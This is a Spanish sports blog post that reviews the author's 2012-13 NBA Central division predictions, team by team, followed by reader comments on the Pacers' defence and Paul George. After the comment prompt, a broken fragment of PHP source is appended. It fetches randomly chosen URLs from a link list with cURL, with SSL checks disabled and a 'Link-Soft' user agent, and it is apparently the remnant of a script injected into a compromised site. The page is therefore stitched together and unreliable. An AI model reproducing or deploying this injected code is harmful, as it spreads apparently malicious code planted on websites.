Revisando los pronósticos 2013: Central

20 de February de 2013 por TheDeerHunter

INDIANA PACERS

Análisis
Pronóstico:
Playoffs, segunda ronda como máximo.
Probabilidad de acierto: Media-Alta
Calificación pronóstico: B-

Atendiendo a los objetivos principales de la franquicia no se puede decir que apostáramos excesivamente fuerte por ellos. Nada puede garantizarles superar la segunda ronda con soltura y en ese sentido bien podríamos clavar el pronóstico. Es en el fondo de la cuestión donde comienza el error de perspectiva. A estas alturas ese “como máximo” es una coletilla que demostradamente sobra. El fondo pesimista de nuestro análisis no hace justicia a la gran temporada que están realizando.

El protagonista de la misma, para más inri en nuestra contra, es Paul George. De él decíamos “Es un enorme jugador pero no una mega estrella potencial. Sí un gran acompañante de una que lo sea”. Casualmente la lesión temprana de Granger puso al equipo en sus manos. Su respuesta ha sido un allstar por el que pocos hubieran apostado al principio. Sus números a partir de diciembre son un escándalo, su versatilidad y liderazgo incuestionables.

El otro protagonista, ausente como decíamos, es el hasta hace dos días hombre franquicia del equipo, Danny Granger. Vuelve de una grave lesión con el equipo metido en todas las pomadas pero con rival personal a su lado. Se abren importantes interrogantes que deben resolverse cuanto antes. Si me lo preguntaran, el traspaso parece la mejor solución. Lance Stephenson se ha consolidado como una opción solvente en el quinteto (acierto significativo del análisis) así que yo buscaría potenciar la segunda unidad. Hay infinidad de opciones.

Por último, únicamente queda mencionar una decepción personal. Temporada correcta de Roy Hibbert pero muy por debajo de ciertas expectativas. Pensaba que este sería su año.

En definitiva. Temporada de notable alto de momento, con posibilidades de convertirse en un verdadero hueso en las eliminatorias. El año pasado ya hicieron sudar a Miami con menos mimbres a mi juicio. 

CHICAGO BULLS

Análisis
Pronóstico:
35-40 victorias. Peleando la 8ª plaza del Este con posibilidad real de no lograrla.
Probabilidad de acierto: Esencialmente nula
Calificación pronóstico: E

Si algo podemos rescatar de la calamidad de pronóstico que firmamos (firmé) en su día es el escepticismo que poníamos sobre la mesa acerca de la vuelta de Rose en Marzo. Hace poco surgían especulaciones de que su recuperación era inminente pero lo último que sabemos de su propia boca es que se lo va a tomar con calma, que quiere volver perfecto y que de momento no se contemplan ni plazos.

Del resto, cualquier parecido es pura coincidencia. Para empezar decíamos “en estas circunstancias es altamente difícil que Thibodeau logre el nivel de motivación/implicación necesario para implementar sus sistemas defensivos”. Si algo está caracterizando a este equipo es precisamente su nivel de implicación. Nadie puede poner un remoto “pero” a lo que esta gente pone en el asador cada noche. De las mejores defensas que hay hoy en día, si no la mejor.

Además, siendo optimistas podíamos esperarnos el rendimiento de Noah, Boozer cuando ha querido le sobra talento para este nivel, Deng tres cuartos de lo mismo, Hamilton cumple con su experiencia… pero que levante la mano quien pensaba que Nate Robinson podía ser así de importante en un equipo puntero. Peor aún, que un equipo con el pequeño jugador en cancha podía defender de esta manera.

Los Bulls son una de las sorpresas agradables del año. Por mi parte están firmando una regular sobresaliente y no se puede descartar que sean peligrosos en algún cruce.

MILWAUKEE BUCKS

Análisis
Pronóstico:
8º de la conferencia Este. Entre 40 y 45 victorias.
Probabilidad de acierto: Alta
Calificación pronóstico: A

No se puede afinar más y eso que titulábamos el análisis  “Bendita impredecibilidad”. Desde entonces hemos vivido un cambio de entrenador jefe, rachas positivas y negativas como una montaña rusa, lesiones, variaciones de rendimiento individual de psicoanálisis, quintetos diseñados tirando de bolillero de bingo… Lo más extraño es que muchos hubiéramos firmado aquel pronóstico que el tiempo y los avatares parecen confirmar. De tan irregulares han sido tediosamente predecibles en sus resultados. Curiosa paradoja.

Podemos confirmar, con conocimiento de causa, que aquel que confiara su temporada de “fantasy league” a alguno de los miembros de esta plantilla no se habrá aburrido. Desesperarse hasta perder la razón sí en frecuencia proporcional al número de “ciervos” en liza. Añadiría agravante mental al que sea, además, fan de la franquicia. De esos no conozco a muchos. Alguno que me viene a la mente no es que fuera el más cuerdo de este lado de la galaxia y hace tiempo que no se pasa por aquí. Los Bucks son capaces de triturar a los campeones un día y al día siguiente perder ante Detroit. No será porque no han hecho rotaciones…

Como decimos, el comportamiento individual es un reflejo del comportamiento colectivo, o viceversa. Exceptuando a Larry Sanders que se ha erigido como un titán defensivo constante y un monstruo de eficiencia más, quizá, Mike Dunleavy, el resto han sido como el extraño caso de Dr. Jekill y Mr. Hyde.

En medio de todo este caos nos queda que de aquí al final de curso, pasará de todo en Milwaukee, clasificarán 8º del Este con 40-45 victorias, caerán en primera ronda siendo un rival incómodo y el universo seguirá su curso.

DETROIT PISTONS

Análisis
Pronóstico:
30-35 victorias, fuera de Playoffs.
Probabilidad de acierto: Alta
Calificación pronóstico: B

Se cierra un mítico ciclo con la salida de Tyshaun Prince, ciclo que él mismo abrió en su año de rookie, con una defensa antológica al mejor McGrady que les llevaría a las finales de conferencia. Hasta 6 seguidas disputaron a partir de ese momento, con dos finales y un anillo como premio. El Billups-Hamilton-Prince-Wallace-Wallace que se sabe de memoria cualquiera que sepa algo de esto. El último representante que ha vivido en sus carnes el declive, paralelo a la de la franquicia de toda su vida.

Desde que comenzó la limpia en Detroit con aquel fatídico trade Billups-Iverson, los Pistons no han vuelto a tocar el 40% de victorias. Este año están en condiciones de hacerlo como aquí pronosticamos. De no haber sido por alguna mala racha puntual nos hubiéramos quedado cortos.

Efectivamente se vislumbra un futuro que no termina de concretarse. Hay buena base en los altos hombros de Monroe y Drummond, por más que cometiéramos el pecado venial de dudar de su impacto inmediato. A toro pasado sorprende la impresión que daba Kravtskov en aquel momento ya que el ruso apenas ha disfrutado algún minuto. Maxiell ha seguido siendo el titular, aportando voluntariedad y poco más. Si hablamos de futuro corregir su rol es una de las urgencias del equipo.

Cometimos dos pecados veniales más en nuestro análisis. Uno por exceso y el otro por defecto. Complicado año de Stuckey, abrazando la mediocridad más absoluta. Por su parte Villanueva, “la cheerleader más fea del equipo”, ha aprovechado bien sus minutos. Junto a Will Bynum completan una segunda unidad que ha aportado varias victorias.

Del resto más sombras que luces. Correctos Singler y Knight siendo amables. Peor Jerebko, y Daye o Maggette prácticamente desahuciados. De hecho, Daye ya está en Memphis arrastrándose . Por mucho que Calderon esté brillando dudamos mucho que permanezca en plantilla mucho tiempo.

Una casa se construye por los cimientos y ellos tienen a Monroe y Drummond. A partir de ahí, mucho trabajo por delante.

CLEVELAND CAVALIERS

Análisis
Pronóstico: 
35-40 victorias peleando playoffs
Probabilidad de acierto:
Remota
Calificación pronóstico:
C-

Leer 40 victorias para los Cavaliers puede oler precipitadamente a columpiada de las gordas. No obstante debemos reflexionar mínimamente para encontrar mucho más sentido en el análisis del que parece.

Confieso que, sereno, no hubiera apostado por casi un 50% para ellos, como tampoco por que se meterían en la pelea por la postemporada pero es que, ya que nos ponemos a confesar, tampoco lo hubiera hecho por el impresionante salto cualitativo que ha llevado al AllStar a Kyrie Irving, o por el de Varejao que ha parecido por momento la reencarnación del mismísmo Bill Walton (con parecida tendencia a lesionarse y todo), o por el buen hacer de Tristan Thompson… Incluso tampoco las tenía todas conmigo del funcionamiento de los rookies (y eso que era de los optimistas). De todo ello habla con bastante tino nuestro análisis inicial.

Como digo, tengo mis dudas si hubieran llegado a esas 35-40 victorias en condiciones normales pero es que las lesiones han golpeado duramente en sus pilares y se han visto obligados a jugar muchas habichuelas con un Pargo, Waiters, Gee, Thompson, Zeller y todo un erial en el banco. Opino que no están haciendo el ridículo, exceptuando a algunos elementos (pienso en Casspi o en John Leuer) que han aportado demasiado poco.

Del análisis inicial me quedo con esta frase:  “no mucha gente se está fijando en lo bien que están actuando tras la salida de Lebron”. Si a vosotros os pasa no será porque no os hemos avisado. El año que viene puede empezar a verse.

Comenta

4 comentarios a esta entrada

  1. Esteban dice:
    #1

    bueno me fue un poco mejor en el analisis de los PACERS que en el de los NETS evidentemente

    hubo falencias es cierto, pero a la hora de analizar, no se sabia la lesion de granger y alli todo el analisis cambia

    si se mira bien, se pedia a gritos pasar a george a la posicion de alero donde podia dar el salto que finalmente ha dado, y se antojaba dificil con granger al lado, casi imposible diria

    otra aclaracion vale en el COMO MAXIMO, es cierto que fui algo pesimista en el analisis, pero mas por decepcion que por factores objetivos, dado que de haber movido a granger (ya vemos que sin el las cosas van a mejor) por un dos (monta ellis o jojo) podian ser candidatos a todo y no lo hicieron
    aun asi, veo dificil que puedan llegar a final de conferencia

      Citar

  2. Esteban dice:
    #2

    mi comentario dentro del analisis que realize de los PACERS

    Esteban dice: 04.10.12 a las 16:44
    #11

    los nombres de martin, gordon, terry y similares, por granger o west, no son tanto por ellos como jugadores sino por una necesidad imperiosa que tienen los pacers

    un definidor, un tirador sobre la marca, capaz de crearse sus propios tiros cuando la cosa este dificil, y esos jugadores podrian hacerlo, cosa q granger en los ultimos PO frente a heat y magic demostro que no podia hacerlo

    pero mas aun, tambien hable de esos escoltas anotadores, por que tambien es imperioso en los pacers que PAUL GEORGE juege de alero y no de escolta, en su puesto natural, puede saltar hasta el all star, de escolta sdigue estando muy muy atado

    con un escolta anotador, matan dos pajaros de un tiro, consiguen un hombre capaz de crear su propio tiro, y pasan a george de alero

    Citar

    Citar

      Citar

  3. Sempren dice:
    #3

    Una de las grandes bazas ocultas de los Pacers era su defensa. Sea por el buen hacer de Vogel, sea por “cambiar” a Granger por George como cabeza visible del equipo, lo cierto es que es uno de los equipos que menos puntos reciben, y una de las claves de que no echen de menos la anotación de Granger.
    Yo no esperaba que el equipo se pudiese sobreponer a una baja así, sumada a la de Barbosa, y menos teniendo carencias importantes en el banquillo (no disponen de un sexto hombre anotador), pero han funcionado como un verdadero equipo, y Paul George se ha coronado. Imprescindible la aparición de Stephenson aportando en todas las facetas.

    Es curioso que los Cavs caigan mucho más de lo pronosticado en octubre cuando Irving ha dado ese tremendo salto, pero es que hasta él ha sufrido muchas lesiones. Esperemos que los minutos extra para los menos esperados sean provechosos en el futuro.
    Ojo los minutos que está teniendo Luke Walton, sentando cátedra le pese a quien le pese xDDDDDD

      Citar

  4. Esteban dice:
    #4

    Sempren: Citar

    la explicacion de la mejorada defensa de los pacers es muy muy sencilla si se compara el equipo al del año pasado

    en primer lugar entra george hill por collison, hill es mas grande y mas largo, y por lejos mejor defensor que collison (y por lejos muchisimo mejor jugador), el año pasado vogel lo guardo en el banco hasta poco antes de los PO por la lesion de collison, aqui han mejorado
    el otro punto trascendental en la mejorada defensa es el ingreso de stephenson por granger, donde ganan un exelentisimo defesor compenetrado al maximo en esa tarea por un granger que solia tomarse sus licencias en ese rubro

    estos dos buenos defensores en lugar de dos mas vale malo, sumados a george qe es un defensor de elite, west y toda su voluntad en ese apartado y hibbert, intimiddando con su tamaño y sus tapas, te da el resultado, el mejor equipo defensor de la liga

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>